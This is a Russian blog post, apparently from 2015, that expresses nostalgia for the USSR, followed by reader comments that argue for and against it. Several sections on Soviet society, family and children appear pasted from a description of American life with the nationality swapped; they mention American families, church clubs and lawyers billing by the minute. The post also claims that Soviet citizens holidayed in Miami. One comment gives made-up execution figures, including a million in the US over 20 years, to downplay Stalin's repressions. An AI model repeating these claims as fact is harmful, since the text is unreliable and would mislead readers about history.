• Авторизация


Общая статья по СССР 21-10-2015 08:56 к комментариям - к полной версии - понравилось!


Ностальгия по СССР 

Основная главная статья 

 

5947894_9488970b535692d6ce7b9b07697 (700x393, 197Kb)

 

 

 

 

 

 

 

 

 

 

 

 

Наша Родина- СССР. 

 

   Исследования социологов показывают: советское детство сейчас в моде. «Хочу обратно в СССР. Как хорошо тогда было — наверное, самое лучшее время в моей жизни» — все чаще и чаще эту фразу можно услышать не только от ветеранов, чья биография накрепко связана с советскими временами, но и от тех, кому едва-едва исполнилось 30. Люди, которым в 1991 году было по 13—15 лет, с любовью коллекционируют советские фильмы и обмениваются воспоминаниями о пионерском детстве. Ностальгия по советскому прошлому становится распространенным явлением среди тридцатилетних

 

 

«Нам повезло, что наши детство и юность закончились до того, как правительство купило у молодежи СВОБОДУ в обмен на ролики, мобилы, фабрики звезд и классные сухарики (кстати, почему-то мягкие)… С ее же общего согласия… Для ее же собственного (вроде бы) блага…«- это фрагмент из текста под названием «Поколение 76—82». Те, кому сейчас где-то в районе тридцати, с большой охотой перепечатывают его на страницах своих интернет-дневников. Он стал своего рода манифестом поколения.

 

 

 

 

Анализ молодежных ресурсов интернета и других текстовых источников показывает: отношение к жизни в СССР поменялось с резко негативного на резко позитивное. За последние пару лет в интернете появилась масса ресурсов, посвященных повседневной жизни в Советском Союзе. «76—82. Энциклопедия нашего детства», пожалуй, наиболее популярный из них. Само название говорит о том, кто является аудиторией данного ресурса — все, кто родился в период между 1976 × 1982 годом. Одноименное сообщество в ЖЖ входит в тридцатку наиболее популярных. Его завсегдатаи с искренней любовью обсуждают фильмы про Электроника, гэдээровские «вестеры», лезвия «Нева» для безопасных бритв и напиток «Буратино».
От «тупого совка» к «золотому веку»

Забавно, что всего лишь полтора десятилетия назад те же самые люди, которые сегодня с нежностью вспоминают символы минувшей эпохи, сами отвергали все советское и стремились как можно меньше походить на своих более консервативных родителей.

[показать]

[показать]

5947894_biznes_na_detskix_ploshhadkax (700x525, 380Kb)Странное беспамятство молодежи распространяется и на более близкое прошлое. На рубеже 80—х и 90—х значительная часть молодых людей мечтала вообще уехать — эмиграция даже в страну третьего мира считалась более привлекательной, чем жизнь в разваливающемся советском государстве:

«Хоть тушкой, хоть чучелом, только быстрее из этого бардака».

«Советская одежда — замечательная, красивая, одни красовки вершина качества.  Советская техника сделана  на совместных предприятиях.  Советские продукты — натуральные.

Кто бы лет пятнадцать назад осмелился отрицать эти аксиомы?!

Но, как известно, время — лучшее средство от детской болезни левизны. Повзрослев, молодые люди перестали быть столь категоричными. Теперь уже воспоминания о телевизорах «Рубин», магнитофонах «Вега», духах «Красная Москва», клетчатых рубашках, красных пальто, мороженом по 15 копеек и газировке в автоматах вызывают легкую грусть и сожаления о том, что их никогда уже больше не будет.

 

5947894_Ylica_9_iulya_v_ByenosAires__samaya_shirokaya_ylica_v_mire_4_1484_am (650x444, 143Kb)

 

 

 

 

Советское прошлое стремительно обрастает трогательными легендами и на глазах превращается в прекрасный миф о золотом веке человечества. Современные тридцатилетние так жаждут сказку, что готовы ампутировать собственную память.

 

 

 

 

[показать]



Поколение тридцатилетних лишилось права на привычное местоимение «мы». Это растерянность не перед временем с его экономической жесткостью, но перед собственным отражением в зеркале. Кто я? Чего я хочу? Отсюда и медитации на тему юности. Человек пытается отыскать ответ на мучительные вопросы там, где он начинался как личность. Но это путешествие не в советское прошлое. Это путешествие в глубину собственной души и собственного сознания.

                                                                                                                                                                                                                           

 

 

 

 

СССР страна, которую мы потеряли....

 

5947894_i (700x525, 41Kb)

 

 

[показать]

5947894_155202_1 (700x466, 80Kb)

 

[показать]

[показать]

[показать]

[показать]

 

5947894_15704_1_onehyde (700x496, 80Kb)

Затаив дыхание, слушали меня ребята. 
«Дядя, а если такая хорошая была страна Советский Союз, как же вы позволили ее разрушить?» - спросили мальчики.
«Народ обманули, - с горечью и болью ответил я. - Нам пообещали еще лучшую жизнь, чем была, а мы из-за жадности и глупости поверили лжецам и предателям. Теперь локти кусаем...».

Один из мальчиков сказал: «Даже не верится, что вы, обычный человек, в советское время могли слетать в Москву, Отдыхать за границей, купить любую вещь, не бояться говорить правду, жить богато, иметь дом , машину, счёт в банке, учиться в любом возрасте, открыть частный бизнес, свободно заниматься творчеством, быть обласканным государством, свободно перемещаться по стране, не быть униженным, быть свободным человеком, да и пользоваться достижениями культуры, например  посмотреть в театре спектакль! Отдохнуть в Майями, в Египте, В Греции, во Франции, или ещё где-нибудь.  А мои родители вкалывают с утра до вечера, дрожат от страха ареста, живут в нищей коммуналке.  В Москву мы никогда не летали, а в театр они ходили лет пять назад...».
А на меня нахлынули воспоминания, и я рассказал мальчикам, как дружно жили все народы. Рассказал, как в столовых на столе стояли бесплатные тарелки с хлебом – бери, сколько хочешь и кушай на здоровье! Какое было отношение к людям, пенсионеры вели полноценную жизнь, могли путешествовать, заниматься спортом, обслуживающий персонал был на высшем уровне, вежливые продавцы, доброжелательные парикмахеры, служащие ателье, вежливая внимательная милиция. Как заботилось о нас государство, где даже инвалид мог стать олимпийским чемпионом, какое было отношение к детям, если ребёнок в магазине начнёт капризничать , то продавец даст ему фломастеры или поставит весёлый штампик на руку. А как интересно мы проводили отпуска! Бывало так: вначале поедешь отдохнуть в Карпаты, потом оттуда летишь на Кавказ, по дороге домой заедешь на Черное море и лишь потом возвращаешься домой. И зарплата позволяла так отдохнуть, и страна была другая – большая и дружная, сытая,   богатая, свободная, полная больших возможностей. Дети инвалиды выигрывали на параолимпийских играх золото и серебро.
 

Общество

 

В СССР  идеал - это общество, уважающее культурные различия и обеспечивающее равенство

[показать]

всех культур. Русские  не без гордости заявляют, что их «сила - в многообразии».

 

Для советских граждан  превыше всего равенство возможностей (но не путать с равными условиями для всех).

 

Русские  глубоко уважают тех, кто чего-то достиг в жизни, начав с нуля и одолев немало трудностей на пути к успеху. При всем том с куда меньшим почтением они относятся к административной элите, наделенной привилегиями по должности. Так что любой русский  будь то хоть сам президент или последний нищий, должен встать в общую очередь и убрать со стола, прежде чем что-нибудь перехватить в закусочной.

 

 

5947894_london_58325335 (700x458, 106Kb)

Российские  понятия «группа» или «команда» отличаются от того, как эти слова понимают в коллективистских странах. Отдельные личности  используют принципы общности и для достижения собственных целей. Если данная команда перестает служить целям отдельной личности, значит, пора выходить из нее  У чрезмерного индивидуализма есть и обратная сторона. Например, советские граждане только и знают что судиться друг с дружкой или с государством.

 

Для большинства советских ( российских граждан)  труд - понятие наиглавнейшее, поскольку именно он служит мерилом всех ценностей и достоинств человека. В РСФСР  любая, даже самая рутинная механическая работа в почете. Для многих советских граждан труд - самоцель: целеустремленность и самосовершенствование вполне заслуживают награды в виде зарплаты или пенсии.

 

Русские  почитают мораль как абсолютную истину. Даже вопросы политического значения рассматриваются гражданами с этической точки зрения. Кстати, возможно по этой причине в СССР  такие понятия как мораль и закон очень близки по сути.

 

5947894_bc56d93f2faac8deb66ea67f60de9280 (700x437, 178Kb)

Русские  предпочитают не пассивно следить за ходом событий, а влиять на них Мания контролировать все и вся касается и времени. Время - деньги, а значит, им вполне можно управлять, его можно точно так же тратить, лишь бы не в пустую. Адвокатские конторы ведут счет на минуты, телефонные компании - на секунды, а местные телеканалы новостей кичатся тем, что за одну минуту могут объять весь мир.

 

Русские - очень мобильная нация, по некоторым подсчетам, средний житель СССР  меняет место жительства 4-5 раз в течение жизни.

 

Семья

Русские  стали вступать в брак гораздо раньше  чем другие народы (мужчины, в среднем, - в двадцать  три года а женщины – в двадцать пять)  Браки заканчиваются разводом из 10 четыре.  ¼ часть детей рождаются вне брака.  Около половины русских живут - или оказываются – в «смешанных» семьях, с приемными детьми или родителями.

 

В семьях с обоими родителями равенство полов распространяется между супругами как на работу, так и на хлопоты по дому. Вместе с тем растет число семей, в которых муж и жена хоть и работают, но из них только кто-то один помышляет о продвижении по службе, равно как растет и число семей с папашами-домохозяевами.

 

Дети

5947894_nDSCF9512 (700x525, 203Kb)

[показать]Родители, даже занятые и поглощенные работой, считают своей непременной обязанностью уделять как можно больше времени своим детям, интересоваться их успехами и развитием, вникать в их увлечения и проблемы. Семейные походы на природу, экскурсии, пикники, хотя бы регулярные ужины вместе - неотъемлемая часть быта многих американских семей. И утренник, организованный в детском саду, клубе, при церкви или национальной культурной организации, на котором яблоку негде упасть от пап и мам с видеокамерами, а любая незамысловатая песенка или стишок из детских уст вызывает бурю аплодисментов, - совершенно обычная картина.

 

В СССР  широко распространены разного рода клубы женщин с маленькими детьми, в которых мамы по очереди остаются с малышами своих подруг, соседей и единоверцев или встречаются на нейтральной территории (клуб, церковь, библиотека и т.д.) для общения, обмена опытом, а заодно - чтобы дети поиграли вместе.

 

Бабушки в РСФСР как правило, не обременены заботами о внуках. Дети - это проблемы родителей, и коль скоро те сочли себя достаточно взрослыми, чтобы иметь малышей, то должны сами думать и том, кто будет ими заниматься.


Верно подмечено, большое видится на расстоянии. Уже прошли годы, как не стало нашей Родины – СССР, а страна, которую мы потеряли, все явственнее и величественнее предстает перед нами. Как седая мать, которую сын убил в пьяном кураже по непонятной причине. Теперь, в утреннем, тяжелом похмелье, этот сын начинает постигать страшный смысл содеянного. И до конца пустых его дней, образ матери будет являться ему с немым укором - что ж ты наделал, сынок?

 

 

Сгинули старые оракулы и пророки, оказавшиеся неприлично голыми перед насмешливым взглядом истории. А новых, как говорится, нет и не будет. По очень простой причине. Так эффективно построить такое сложное многонациональное государство, каким являлся СССР, как сделали это большевики, никому, и ни на каких иных принципах не удастся, даже применительно к его урезанному "правопреемнику" - эрэфии. 

Сколько бы не золотили орлов и не придумывали бы замысловатых штандартов. Не тот уровень, не тот калибр, не та элита... Где сейчас все эти витии и краснобаи, "специалисты" по экономике и межнациональным отношениям, властители дум и возмутители спокойствия, все эти солженицыны и сахаровы, старовойтовы и шмелевы, нуйкины и пияшевы? Иных уж нет, а те далече... 

Такое впечатление, что они и сами сейчас не прочь зачеркнуть то свое перестроечное

 

словотворение, миллионными тиражами утюжившее общественное сознание. Как-то хотел найти в Сети, хоть что-нибудь из публицистики того времени, но без успеха. Бесследно исчезли и шмелевские "Авансы и долги", и "Где пышнее пироги" Ларисы Пияшевой, и прочие сочинения перестроечных сирен и трубадуров.

 

5947894_Orlando_01 (700x376, 77Kb)материализацией Красного проекта, олицетворением мечты и надежды человечества.

Его право на существование было оплачено жизнями миллионов лучших сынов и дочерей отечества и не подвергалось никакому сомнению, с чьей бы то ни было стороны.

 

Подходить к нему с мерками буржуазного права, значит продемонстрировать свой безнадежный местечковый провинциализм, полное непонимание его сути. И его особый статус молчаливо признавался мировым сообществом.

 

Советский Союз даже в ООН был единственной страной, имевшей три места, которую кроме собственно СССР, представляли еще Украина и Белоруссия. Главным доводом так называемых "демократов" было утверждение, что СССР есть империя и, как и всякая другая империя, исторически обречена на исчезновение.

 

5947894_0_653ce_17b673e2_orig (700x463, 323Kb)Это ложь, умышленный обман народа кучкой самозваных и, зачастую, небескорыстных "специалистов".

Советский Союз никогда не был империей! Он был построен на совершенно иных идеологических принципах. На принципах пролетарского интернационализма.

 

И как бы не корежило это чей-то слух, Советский Союз был государством рабочих и крестьян. Что находило свое отражение и в государственной символике в виде скрещенных серпа и молота, и в Конституции, законодательстве, и в господствующей общественной морали. Партийная и хозяйственная бюрократия, при всей своей косности, вынуждена была руководствоваться интересами трудящихся классов. Правда, все более и более, не забывая при этом, свои собственные.

 

При отсутствии оздоровляющей обратной связи, процесс разложения элиты зашел довольно далеко. И это не замедлило сказаться и на обществе. Стала происходить трансформация общественного сознания в сторону индивидуализма, потребительства, личного успеха. А в этой системе координат, где мерилом всего становятся деньги, материальное благополучие, советская система явно уступала развитым странам Запада. Хотя, строго говоря, уступала не всем, и не во всем...

 

Когда в кранах есть практически даровая холодная и горячая вода, газ по 20 коп. в месяц, теплое жилье, электричество в розетке, бесплатное образование в голове, талоны на бесплатное  питание ,  где любой человек, будь то бедный, инвалид, нищий обласкан государством, можно и пофантазировать на кухне про  тоталитаризм,  хамство продавцов, и тотальный дефицит. 

 

Кухонные мыслители не понимали, ( намазывая большой кусок  масла с красной икрой на хлеб,  и запивая рюмочкой коньяка, критикуя свою правительство, и слушая репортаж с митинга несогласных что они уже живут в самой свободной и процветающей стране мира. Со всеми ее товарным изобилием, «обществом потребления", избалованностью комфортом, высокими пособиями по безработице, инвалидности, пусть и неравенством между бедными и богатыми, успешными и неудачниками ,  глупыми ТВ-шоу по телевизору, либеральными ценностями, свободой слова..... и так далее…  Это была свобода, недоступная западному обывателю. Свобода от безысходности,  от унижения, от бесправия, от голода, от унижения экономической и политической системами,  от изнуряющей работы, от эксплуатации, от нищеты, от страха перед будущим. Раньше все это казалось само собой разумеющимся, незыблемым порядком вещей.

 

Нынешняя молодежь уже с трудом во все это верит. Система больше не устраивала "верхи" чем "низы".

 

5947894_TQLEEXOWG7H9BEy3HDE6zST4We9SelTnGkTevHkRFQkhHOf4RXDV9u0JRoUZ2LVt8k (700x525, 78Kb)Вполне допускаю, что большая часть элиты совершенно искренне хотела перемен к лучшему. В годы войны немцы с самолетов сбрасывали над расположением частей Красной армии листовки. Они являлись пропуском для беспрепятственной сдачи в плен. Наверное, в них расписывались преимущества сытой и веселой жизни в лагерном бараке с салом и шнапсом, как альтернатива неизбежной гибели под немецкими бомбами на фронте. Но одно дело, когда подобную агитку противника поднимает не слишком грамотный солдат, и другое, когда эту листовку держит в руках генерал. И не только держит, но и верит тому, что в ней написано. И не только верит, но и организует сдачу доверенной ему армии врагу. Так высшее руководство СССР, в силу своего невежества, некомпетентности, вопиющего дилетантизма, вопреки воле своих народов, выраженной на мартовском референдуме, и сдало нашу Родину.

 

После "победы демократии" в августе 91-го, первое, что вспоминаю, это истеричные вопли по телевизору про коммунистов, которые через Амур тысячами бегут в Китай. Это прием уже не просто пропаганды, а сознательной информационной войны, применяемой для ошеломления и дезориентации противника на поле боя. Это формирование новой реальности при помощи информационного оружия. Подобный прием повторился, когда после ельцинского мятежа в октябре 93-го сообщалось, что арестованных участников сопротивления "тысячами свозят на стадион", явно стараясь вызвать ассоциации с пиночетовским путчем 1973 года, и дать установку на желательное дальнейшее развитие событий. Подобная "журналистика" весьма характерна для боевых операций американской армии, в частности в Ираке. Так что аналогия с немецкой листовкой не так уж и фантастична. На войне, как на войне...

 

Иногда, можно слышать что, дескать, в Советское время было общество потребления, в магазинах было 120 сортов колбасы и 200 сортов сыра и всё это только красовалось на прилавках. А сейчас этого нет.  Да было. Но люди все это покупали. Никто не голодал. Были акции, были скидки цен в магазинах. Да если сейчас положить на прилавок, ту советскую колбасу, то очередь была бы по 200 и 300 человек, а, то и более. Да сейчас очередей нет. Потому что жрать нечего.  Потому что колбасы нет. Разве это колбаса, если в ней нет мяса? Тоже самое можно говорить и о других нынешних демократических продуктах, если их можно назвать продуктами, а не всеобщей отравой.

Советский Союз кормил своих граждан натуральными продуктами,  пусть и излишним изобилием, и как говорят коммунисты  (  100 сортов сыра и 300 сортов колбасы красовались на прилавке) Но покупательская активновность была приличная и практически никто не голодал. 

 

5947894_75c7f59648af9a8bcf9710bfa5abba25 (700x525, 132Kb)Советские люди жили по законам, где их интересы нигде и никогда не пересекались с деньгами и выгодой, кумирами их были не банкиры и дилеры, не брокеры и иже с ними. Героями их были мужественные и сильные люди из поколения их отцов, из 20-х и 40-х годов. Они равнялись на тех, кто строил Волховскую электростанцию и Днепрогэс, Магнитку, Комсомольск-на-Амуре, Новокузнецк, кто осваивал Сибирь и Дальний Восток, строил заводы и дома, кто выиграл страшную войну и освободил Европу от фашизма.

 

Конечно, все это прописные истины, но, к сожалению, они теперь напрочь забыты. Из истории нашей страны вычеркнуты семьдесят лет, семьдесят лет жизни советских людей, которых теперь можно сравнивать с «пылью» и называть «совками», хотя до сих пор Россия и все мы живем тем, что было создано поколениями 20-70-х годов.

 

Стыдно и страшно, что те, кто пинает прошлое нашей Родины, забыли, что все они родом из СССР, что все они хоть и бывшие, но советские люди, что история СССР – история их Родины, которая не бывает бывшей, что «совки» – это их деды и отцы, которые не продавались и не предавали, а были людьми чести и долга.

 

[показать]Стыдно за наш народ, который молча позволяет плевать в свое прошлое. Мы молчим, как будто и не было в нашей жизни 70 лет побед и строек, прекрасных песен и стихов, замечательных спортсменов и блестящих ученых, как будто не было нашей Родины – Советского Союза. Мы забыли, что все, что мы имеем и чем пользуемся, досталось нам от Советского Союза: наше жилье, больницы, поликлиники, детские сады, школы, санатории, дома отдыха, пионерские лагеря, нефть, газ, электроэнергия... И молча смотрим, как абрамовичи и прочие нагло проматывают наше наследство, достояние нашей страны, созданное трудом поколений 20-70-х годов.

 

Теперь у нас превыше всего – доллар, он и в сердце, и в глазах, все продается и распродается оптом и в розницу. Что ж удивляться тому, что о нашей истории рассказывают иностранцы: англичане, американцы, немцы (фильм «Враг у ворот» о Сталинградской битве; энциклопедия «Асы Сталина» о наших летчиках, защищавших небо Родины). Низкий поклон этим людям за их память и интерес к советской истории.

 

5947894_628aaad0bfca (633x482, 38Kb)А моя особая благодарность английским журналистам Томасу Полаку и Кристоферу Шоурзу, составителям энциклопедии «Асы Сталина», за их огромный труд (в энциклопедии более тысячи имен советских летчиков). Именно в этой энциклопедии я нашла сведения о 127 ИАП Ленинградского фронта, где воевал и погиб родной мне человек.

 

Из этого полка названо девять фамилий. За первые четыре месяца Великой Отечественной войны шестеро из этих 9 сбили 38 самолетов, 2 – тараном; 38 фашистских самолетов не долетели до Ленинграда. И это только один полк и всего 6 летчиков-истребителей, мужеству и мастерству которых отдают дань английские журналисты.

 

А что же наши писатели, историки, журналисты? Молчат. Табу на все 70 лет советской истории; или ничего, или только плохо.

 

Мне больно оттого, что исчезла моя Родина – Советский Союз, и это не ностальгия по товарному изобилию, высокому качеству сервиса, улыбкам граждан,  и шикарной жизни,   как модно сейчас определять суть прошлого. Это ностальгия по той жизни, где милиция  ну пусть была отлично вооружена, но хорошо боролась с преступностью,  где  да были стальные двери, но это делалось по желанию самих граждан, где  человек не был унижен, где государство заботилось об инвалидах и малоимущих, все делалось для человека, где ты прежде всего человек, а потом все остальное, где работали законы, где человек был хорошо защищён. Что тебя ограбят или прибьют, где жизнь человека, хоть он и был «винтиком», но много чего стоила. Там, в той жизни, не расстреливали закон в центре столицы и не бомбили собственные города, не взрывали людей в театрах и метро, в электричках и собственных домах.  Не унижали человека хамством и грубостью в магазинах, в трамвае, в медучереждениях, на улице. \где были вежливые продавцы, квалифицированные врачи, учителя, учёные.  Там была уверенность в завтрашнем дне и в завтрашнем дне детей, там люди много смеялись, спорили, мечтали и не делились на людей кавказской, азиатской и прочей национальности, там двери дома были открыты для каждого.

 

Но... Но мы выбрали свой путь сами, отреклись от прошлого и предали своих отцов. А история и жизнь такого не прощают. Без прошлого нет будущего.

 

Свой добрый век мы прожили, как люди! И для людей!

 

5947894_img (700x393, 255Kb)Сейчас, даже высшим руководством России признается, что разрушение СССР было крупнейшей геополитической катастрофой. Поубавилось любителей щегольнуть геростратовой славой своей причастности к Беловежскому сговору. Все вдруг, оказывается, были ярыми сторонниками сохранения Союза и если бы не ГКЧП, да не партократы, да не то, да не это...

 

Какой-то бывший украинский партсекретарь, то ли Шевчук, то ли Кравчук, не прочувствовав перемену в настроениях, с гордостью назвал себя одним из могильщиков СССР. Можно войти в историю и со славой могильщика, конечно. Дело вкуса. Но по мне, он выглядел бы намного достойнее, если бы признался в школьном онанизме.

5947894_7321128_31243 (700x525, 93Kb)И, кажется, ему же принадлежат слова, не ручаюсь за точность – "У того, кто не жалеет об СССР нет сердца, а у того, кто хочет его восстановления – ума". Типа афоризм, с претензией на мудрость.

 

Вся эта публика боится не восстановления Союза. Она смертельно боится неотвратимого возмездия за содеянные государственные преступления. Ей не дает покоя страх предстать перед суровым судом народов и понести ответственность соразмерную содеянному.

 

Дамоклов меч, висящий над их головами, мешает нормальной праздной жизни отставных предателей. Председательствовать в фондах, читать "лекции" в университетах, красоваться в европейских салонах, пристраивать своих отпрысков к кормушкам. Не знаю, как насчет ума или сердца, но насчет совести могу сказать определенно. Ее нет у людей, которых после разрушения своей страны не преследуют эти глаза седой матери, принявшей мученическую смерть от рук любимого сына, с немым вопросом – что ж ты наделал, сынок?


 

 

вверх^ к полной версии понравилось! в evernote
Комментарии (8):
21-10-2015-10:32 удалить
Дело в том, что СССР начал трещать по швам уже при Горбачёве. Тотальный дефицит, межнациональные конфликты Армения, Азербайджан, Грузия, Осетия, Абхазия, Прибалтика. беловежские соглашения возникли не на пустом месте. Это то же самое, как шатающееся зуб, его вырвать или ждать когда он сам выпадет. Трухлявое дерево, ждать когда оно само упадёт или пригласить дровосека. Я помню, в сознании у людей было понятно, что страна уже больна, её было не удержать. Если бы даже Горбачёв арестовал бы участников этих соглашений, это породило бы другие проблемы. Это то же самое что муж и жена друг друга ненавидят и им не давать подписать документы о разводе. выпавший зуб засовывать обратно в десну. Если Горбачев продолжал править страной и дальше, то это была бы уже просто пародия на СССР. В стране был бы тотальный дефицит, войны на Кавказе, экономический крах, девальвация рубля, голод, озлобленный народ, голодные бунты и так далее. Карточки и талоны начиная от трусов и заканчивая машиной. ИМХО.
Alexseysss 22-10-2015-20:34 удалить
Весело тут не смог не оставить комментарий))) 1. Начну о себе. Я молодой человек 25 лет, образование среднее полное, работаю управляющим среднего звена, с зарплатой чуть-чуть выше среднего, живу гражданским браком. В ближайшее время (3 года) планирую: дальнейший карьерный рост, жениться, получить высшее образование... Сейчас я сам планирую, строю свою жизнь, я творец своего счастья, Я ЖИВУ, я делаю свой выбор сам, А НЕ ГОСУДАРСТВО!!! А вот скажите мне с такими успехами (без образования, без семьи, не служил), кем бы я был в СВЕРХДЕРЖАВЕ СССР?.. наверно, отбросом общества, а за что, а почему? 2. Только не далёкий человек мог в то время верить, что всё хорошо, что вот оно счастье. Моя мама ещё в школе (конец 70-х) поспорила на машину со своей одноклассницей, что к 2000 году социализма у нас не будет. Итог, начало 2-х тысячных годов, встреча выпусников, вот она машина сгнивший грузовик, который мы конечно не взяли))). Так что людям, которые думали своей головой, а не колликтивной, и в те годы было ясно, что конец не так далеко. 3. ТЕПЕРЬ ХОЧУ СПРОСИТЬ, КУДА ДЕЛАСЬ ТА СУПЕР ДЕРЖАВА, ГДЕ ТАК ВСЁ БЫЛО ХОРОШО? А всё просто. вопрос внутренней ответвенности за страну каждого кто в ней жил. Кем стала та однаклассница — учителем. и поработала даже по профессии, но к моменту встречи выпусников она была первым предпринимателем в родной деревне. Так кто развалил страну, именно вы граждани СССР, ( И К НЕЛЛИ ВОПРОС, а почему?) Наверно, там так хорошо было, как вы рассказываете! Или вас не спросили. как кто-то скажет. Тогда другой вопрос зачем жить в стране, которая вас даже о самом главном не спросила; быть, или не быть?! Ладно, капиталисты разрушили? Тогда почему свехрдержава, почему она так легко сдалась? Кто же из нас врёт? Ну, где же вы были. когда белый дом из танков растреливали? Да, что белый дом, за несколько лет до него уже ясно было куда всё катиться! Почему державу не отстояли? Тогда не пришлось сейчас новую страну строить! И лить крокодиловы слёзы сидя дома за ПК в Инете...... И жить в такой «страшной» стране! 4. Вот, ещё одна не справедливость ваших суждений граждане СССР, почему начало истории РФ вы сравниваете с рассветом СССР, а не началом 20-30-е года, А? Давайте сравним эти лучшие годы СССР, когда пройдёт ещё несколько лет в истории России (20-30 МОЖЕТ И ВСЕ 100 ЛЕТ. Когда и мы все здесь умрём от старости. 5. Но как бы там не было, я верю во многие плюсы советской страны. Только признайте, что в общем для жизни она была не особо пригодна. Давайте возьмём все те плюсы и начнем уже вместе строить нашу страну. Сколько можно сидеть и страдать, и настоящие грязью поливать. ЛЮДИ СПАСИТЕ СЕБЯ САМИ!!! Кончились те времена, когда за вас кто-то что-то всё время решал, школьные годы прошли, пора в ВУЗ, да семью заводить))) Ну где ваша гражданская ответственность))) Только и можете на других всё перекладывать! 6. А настольгия — это и в правду здорово. И я рад за вас, за то, что вам есть, что вспомнить, что ваши деды и отцы об этом позаботились. Мне вот досталась молодость конца 90-х начало 2000-х, что-то не знаю, что буду вспоминать, если всё плохо сотрёться))) Вот по этому теперь хочу сделать всё, что от меня зависит, чтобы моим будущим детям и внукам жилось в этой стране лучше, чем мне.
01-03-2016-10:29 удалить
Прочитал комменты и пришел к выводу, судя по коментам Лиды и «анатолия к.», что действительно москвичи это какая-то отдельная категория граждан страны со своим менталитетом, и как далеки они от всего остального народа. Оказывается в СССР и образование было плохим, школы раздолбанные и больницы никудышные, короче ВСЁ. :) Но самое странное, что они до сих пор считают, что сейчас всё это намного лучше. :) Создается впечатление будто живут в другом государстве или на другой планете и не видят очевидного. Я в отличие от этих персонажей тоже наверно жил в другой стране и не видел школ со сломанными туалетами (хотя учился в двух разных, тогда, республиках) и учили меня нормально (английский я знаю только лишь благодаря школе, т.к. в вузе этому не придавали большого значения), и никакой пропаганды на уроке физике или химии я не припоминаю, да и откуда ей взяться, если законы физики не зависят от формации в стране. :) Здесь «алексей к.» сетует на то, что раньше человека часто менявшего работу называли «летуном», но недопонимает одного, что раньше у любого человека не было проблем с выбором этой работы, поэтому и «летали» с одного места на другое, если что-то не нравилось, это первое, а второе, как же назвать человека, который к 40-50 годам поменял 10-20 не просто мест работы, а профессий (бывало и такое). :) Т.е. так и не определилися чего он хочет в жизни, при чем не имея порой даже специального образования (хорошо, если есть среднее). Так, что полагаю все эти «опусы» москвичей, жалующихся на несовершенное прошлое, бред сивой кобылы. Особенно умиляет когда «лида» говорит, что сейчас может купить ВСЁ на свою пенсию. :)) Тогда вопрос, а всё это что? Пару любимых книжек? :) Может вы можете взять нормальную путевку, хотя бы в Сочи? Боюсь, что, несмотря на московские увеличенные пенсии, вряд ли. :) А раньше её можно было получить бесплатно. :) Кстати, «алексею к.» насчет кредитов на машины и видеотехнику ( В/М электроника ВM-12) Такой период был- примерно, если не изменяет память, в 84 году (по-моему при Андропове).
01-03-2016-10:31 удалить
Павлу. Хорошая русская поговорка гласит заставь дурака молиться, он и лоб расшибет. Вы так постарались полить грязью то, о чем не имеете представления. Я могу дискутировать о крахе СССР с Лявоном, имея кроме всего прочего опыт экономиста, а на ваш комментарий даже и сказать нечего. Просто глупость. Нельзя судить о прошлом страны по репликам в Интернете. Для таких как Павел скажу, что государство в СССР заботилось о гражданах даже больше, чем правительство США. Бесплатное жилье, обязательное устройство молодых специалистов всех уровней. Бесплатные путевки на курорты и санатории Черноморья и Прибалтики. Профсоюзы возили самолетом своих сотрудников по маршрутам выходного дня в Ашхабад, Минск, Тбилиси и другие столицы республик. Почти насильно водили своих работников на балет, оперу, симфонические концерты. В обязательном порядке областные филармонии выступали в деревенских клубах. Сотовые телефоны хорошо заменяли телефоны-автоматы, они были на каждом шагу. За 2 копейки можно говорить хоть целый вечер. А вообще глупо приводить в аргумент то, чего тогда вообще не существовало, даже в США. Свое свадебное путешествие в 70-х мы проводили за границей, на курорте в Болгарии. Павел, не повторяйте чужие глупости, уважайте себя.
01-03-2016-10:32 удалить
Неправда Хрущева до сих довлеет в умах. Если посмотреть , что откопал публицист и экономист Жуков в отношении расстрельных приговоров - то за время Сталина их было 750 тысяч, но не все приводились в исполнение - заметим за 30 лет - 750 тысяч! А ведь были бандеровцы, власовцы в числе этих цифр полицаи тоже, предатели во времена ВОВ. Так вот другой публицист забыла фамилию подсчитал ск. расстрелов было во времена Брежнева за 20 лет.. Вроде бы цифра приговоров (но в их числе были и материальные крупные хищения с расстрелом) то около 500 тысяч! А когда тот же подсчитал в США то там 1 млн за 20 лет! так что вот и судите - много или мало 750 тысяч за 30 лет, 500 тысяч при Брежневе за 20 лет и 1 млн в США за время брежневского правления.. Так что вопрос о репрессиях - это лживый вопрос! И именно буржуазия не дает покоя и себе и нам, от ненависти к Ленину и Сталину их зашкаливает, а потому там усиленно идет до сих пор промывка мозгов ядовитой ложью о репрессиях Советую всем почитать редкую книжку Р.Косолапов "Слово товарищу Сталину", увы она издавалась всего лишь тиражом 2 тысячи экз. Но я помню и другое. У моей бабки Анны Ивановны муж погиб уже в 41 под Москвой, на руках 4 детей, дядя Гера родился в 1940 году. И вот из четверых детей все выжили ( а что бы было в первую империалистическую у вдовы из крестьян!!!) - итак мой папка токарь универсал 6 разряда на военном заводе, Орден Знак Почета, дядька - конструктор рядовой на авиационной заводе, тетя Соня - учитель, тетя Валя - главбух на базе потребкооперации, трое (кроме моего папки) с образованием, но ему пришлось в 1944 году встать в 14 лет за станок - вся страна так жила. Так что советская власть дала именно крестьянам все! И не надо про репрессии. Вот я живу в другой област,и но 5 лет в сельском хозяйстве тоже - 1978 год колхоз Ярославка - коттеджи на 2 человек, А во всех 17 колхозах-совхозах нашего района ДК, школы, амбулатории, бытовка - даже ателье, магазины не просто магазины - а торговые центры. Но ведь что творили перестройщики - только потому что что якобы в 1937 году были репресссии - ДОЛОЙ СОЦИАЛИЗМ, только потому что до 1964 года у колхозников не было пенсии - ДОЛОЙ СОЦИАЛИЗМ! Ну и что что в 1987 году уже у всех пенсии, уже почти решен квартирный вопрос, образование, медицина наука все на уровне, а театр...... но все равно - коль есть в прошлом грехи - долой социализм! И при этом показная любовь к религии которая призывает к всепрощению Всех простим, но социализм нет! Так что классовый вопрос никуда не исчез. И именно классовые кликуши буржуазии орали против социализма, а наиболее ненавистно против Ленина и Сталина. Сталину слишком много было непростительно - посмел победить в самой страшной войне! И потому как бы сейчас не маскировались все противника СССР - их классовая сущность понятна, они служки буржуазии. и то хрущевское окружение тоже ясно для нас - социализм слишком требовательная система - коллективизм требует усилий! директору с партбилетом надо быть всегда в тонусе, иметь моральный облик соот. , и вдруг у такого со скрытыми буржуазными задатками забрезжила впереди перспектива во времена хруща - никаких тебе чисток, замены партбилетов и главное - отмена партмаксимума в 500 рублей, а как "они настрадались" когда у беспратийного диретора была зарплата 2тысячи... Поняли почему все так поддержали хруща, вся наша 